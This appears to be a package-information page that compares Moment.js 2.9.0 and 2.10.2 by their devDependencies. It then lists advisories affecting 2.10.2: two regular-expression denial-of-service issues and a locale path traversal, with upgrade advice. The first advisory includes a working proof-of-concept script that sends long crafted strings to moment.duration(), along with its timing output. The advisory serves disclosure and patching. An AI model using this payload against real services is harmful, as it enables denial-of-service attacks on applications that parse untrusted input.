Moment.js saw a notable update between versions 2.9.0 and 2.10.2, refining its capabilities for date parsing, validation, manipulation, and display. Both versions maintain the same core functionality and are designed for developers needing a robust JavaScript date library. Analyzing the devDependencies highlights key differences. Version 2.10.2 replaces nodeunit and karma-nodeunit with qunit, karma-qunit and es6-promise, suggesting a shift in the testing framework towards QUnit and the inclusion of ES6 promise support, possibly for asynchronous operations or broader compatibility with modern JavaScript environments. Additionally, version 2.10.2 introduces grunt-contrib-copy, indicating improvements in the build process potentially for handling file copying tasks more efficiently. The release dates also show a gap of approximately three months between the two versions.
Developers choosing between these versions should consider the testing framework alignment with their projects; QUnit enthusiasts might prefer 2.10.2. For those already invested in Nodeunit, version 2.9.0 could be a simpler choice. However, the inclusion of ES6 promise and the updated, more efficient build process make version 2.10.2 a compelling upgrade for leveraging modern JavaScript features and optimized development workflows. Both versions remain valuable depending on specific project needs and environment. Check the official changelog for complete details on breaking changes, bug fixes, and other feature additions to assist in your decision-making process.
All the vulnerabilities related to the version 2.10.2 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: